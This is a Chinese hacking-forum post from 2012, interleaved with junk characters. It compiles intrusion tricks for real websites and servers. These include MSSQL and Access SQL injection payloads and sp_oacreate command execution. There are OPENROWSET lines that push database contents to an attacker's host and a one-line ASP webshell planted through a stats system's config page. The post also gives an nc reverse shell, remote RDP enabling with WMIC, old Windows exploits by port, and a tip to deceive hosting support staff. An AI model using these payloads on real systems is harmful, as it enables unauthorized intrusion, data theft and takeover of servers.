中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]
作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关
% O3 C: N# p* r1 ^0 r7 }1 `) _2 y0 a  a* t1 ^

4 b# c: l8 c( c7 m  e: rSA点数据库分离搞法+语句:
: ?9 R& d# B' Z' u# d+ h
: _! M3 h& T/ W1 U4 R注射点不显错,执行下面三条语句页面都返回正常。
" t' I7 ~+ \, Y  `$ c! tand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
, i' ]* ]" N, o  eand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
8 U0 O- i4 ]; j( j! iand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
% @. k0 C; c- Y7 l可以列目录,判断系统为2000,web与数据库分离) l( b" z  R5 Q( `, o: o
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。$ O0 v7 ?, q, M2 X
在注射点上执行
- l8 W. r5 x5 ~declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
3 ^1 L/ x1 r2 s  k" u* K页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP1 E. y7 \) j2 C+ g4 K) N9 e
还有我用NC监听得其他端口都没有得到IP。
1 h4 s# @) J0 Y! s) k& @7 z
1 X9 K4 B: C% V通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。" f- W7 P0 O4 h! u; Y9 W
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--) J, R* a/ A3 G' H: {* j7 a" p% u. \$ b
9 V& C7 t3 e7 [
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
' r7 d! q! L6 L  a, {/ G+ @1 n# R( e  ~7 n. K2 `
现在就猜想是不是数据库是内网而且不能连外网。; A$ y- b7 f4 x" w8 j# ~/ v& I$ G

8 E9 l1 L! d3 l  C7 z% n
) A2 K) C- s# ~) J, X4 A% zaccess导出txt文本代码) R# g* L& j' V
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin% f" l8 i! ^/ ]( F  i$ P4 d
; o. q% W9 [  p0 A7 Q

8 O+ s3 g' W1 p0 a9 h1 p
( e( K) U/ [( n2 e% X3 t  E* B自动跳转到指定网站代码头
5 X' d, l! f5 I; {8 \/ |6 l<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>5 |5 f( _+ U' G2 t* v
, B7 ^  Q+ I) L* b7 A
2 O, Y7 ]2 M4 e4 W: _5 J& i- ^
入侵java or jsp站点时默认配置文件路径:
- E: ^* T+ R- [\web-inf\web.xml
/ I# _, }: W+ z9 C* ~. S8 s* Gtomcat下的配置文件位置:  }* i( t( q! D
\conf\server.xml            (前面加上tomcat路径)* a+ K  U# R+ S8 z$ N0 H
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
5 I% X3 N" C# a/ S# R; x3 e% A8 h7 r) B' t. s" S

' Y) B* r- r, H' ^1 Z$ i1 y6 i
# @; _, h" l+ [3 ~( f检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:* j" j6 m1 [/ C, R0 b
-1%23) w$ j7 i0 _( {- M
>
  F$ s9 W  g; o6 L5 W% b3 s5 S<
- |7 E8 x# K( P+ E1'+or+'1'='15 O2 }1 X4 r$ a
id=8%bf
$ ~4 w* d- T$ M, ?5 n8 v0 P8 C) ~3 Q% n  Z1 R" J$ G
全新注入点检测试法:. _  O/ G; I/ @+ q  p
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
) k. z/ F9 X* e& d/ b9 s/ i9 \2 n
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。/ R1 W. r! S6 e

4 I! n$ e0 n8 A. }; T7 `搜索型注入判断方法:" {& B4 n; q2 A3 y6 M5 U
北京%' and '1'='1' and '%'=') ^. [; s- l" B" m8 L+ S, |
北京%' and '1'='2' and '%'='
* a8 A1 g  ~# |$ L' A* d2 n- h/ k1 o
! f4 B: T$ p% j3 B7 L
: h8 S. A7 p5 s, V9 `0 q6 xCOOKIES注入:, p3 l- T* ~# R" ^

. _- K, }9 B) d8 n& Y5 Tjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
& C8 {9 f- R6 L- B2 t! }. I. y3 S+ U% l1 c
2000专业版查看本地登录用户命令:
5 ]5 x, h! e9 V4 q: p5 S( ]5 F* p9 Enet config workstation
1 s( I) D6 w2 x" m' q6 j# e# J
  s& U& x+ [# A! z, ~, q7 o9 h4 s
$ M: u( H4 s& z: ~- i+ N2003下查看ipsec配置和默认防火墙配置命令:
- l5 Q: L# O. f! N. }' Vnetsh firewall show config
8 w" O% B- ]) Ynetsh ipsec static show all- p8 C, n0 w6 v( x3 J: n
# r- }6 M( [. Q7 k
不指派指定策略命令:* ]4 V# X* }& n
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)' r1 v$ i% v  m! I: Q
netsh ipsec static show policy all  显示策略名
+ K: b2 W& d; L( r6 c6 \% |7 t7 m$ F: y9 z# I
2 Z: x0 `) v! ^  B  Q
猜管理员后台小技巧:5 b* B4 O) k* h0 y/ s
admin/left.asp
) U$ X& u6 c& _1 padmin/main.asp
3 w1 l1 G( o) j( wadmin/top.asp
1 Z) H! X' I) B2 J5 W6 s/ Y" badmin/admin.asp
% F0 Q3 ], x' g  b% I会现出菜单导航,然后迅雷下载全部链接
! `$ r, T. h2 T: Q3 y3 s' q
$ k- M  Y( B# |6 k) m$ L! Q7 @) f# ^4 _; v
社会工程学:
, V* ~, Z8 h' z, Y用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
1 q/ p0 c2 a0 v' {; T' j/ d: I: ]然后去骗客服
1 ^. a- t0 q9 i$ E: }. N" U9 r, p5 Q" K8 b# v9 v

8 n8 c: }! H6 B$ d8 B统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
  J, s1 z( O8 o; O查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
8 G: D% i9 e0 B9 U  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
% {2 ?/ h2 j* T/ K8 w. u
0 _  N4 D. u3 l9 i3 g" L" ~4 N1 b; s' P. ]* W8 X
6 I: M' f8 n$ ^/ s7 U4 P% Q6 {! Q
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
6 O7 h! y6 f  Q
3 S. _0 m8 V7 _7 h/ z. }- C9 g
, h9 ~: Y$ k8 b0 c/ X+ m. f& S) f0 D. o
# m: ]1 D/ v6 W; bCMD加密注册表位置
; m2 ]+ K. y. U3 G(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor7 i& X' t* N4 T, J( p. Q: x$ C
AutoRun" H. B1 h' c# ?8 V& G
1 ]+ g+ q3 @1 _/ Y. M) {* x
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor; i0 w2 L& P$ }& Z/ }% Z( }
AutoRun
3 N* m3 x4 e& x$ O7 e- A
' _) @1 e: }! B: T
, `+ X# C" y7 Y% q2 }. _5 A在找注入时搜索Hidden,把他改成test1 T- `; @/ E4 Z: ]
0 ~% H7 |5 v5 I) [
5 P% N* b) c8 I: N

1 v, c& z0 [* L5 b% k4 O# n! {mstsc /v:IP /console
( ?  E, ^9 Q- ^9 B' ^5 m) B* P( ?; n6 B' S7 M

* p9 A, X; W0 h6 n" S7 y' {! _) _一句话开3389:
5 k& x2 ]4 s( g2 @; h! L. w3 B& u  y
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  + d% q, H2 @& }8 Q! u+ ~5 k
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
8 I& p3 b2 h# ?4 _! S7 q* o- m3 B* Y6 R  _
% R+ z4 N) Z# n, d0 B
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
4 I$ G) F0 R" |$ Y5 FInsert into admin(user,pwd) values('test','test')' y7 _* E4 E8 X' f- c' k
6 F' k5 d. Y9 o/ u0 N/ u& e
+ ^0 s& q5 l4 ^' B5 O" A. X
NC反弹! Y) T$ u/ _# |: t+ r$ n! }. c
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
+ x; N& y# j  o* ^) z' m* c8 h9 I然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
0 c5 h" G3 w% q" P! j) p
0 y9 b5 U' q* E% J* z( M: ^( J/ Z. m
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题, X- T4 R1 ^. e; O2 n: V, c

8 s3 z  Y3 G# h( i* \有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录: i6 \! ^1 k' y. O9 S4 b
例如:* B9 o7 l5 K2 h
subst k: d:\www\ 用d盘www目录替代k盘
' B. O8 B) ^" Hsubst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2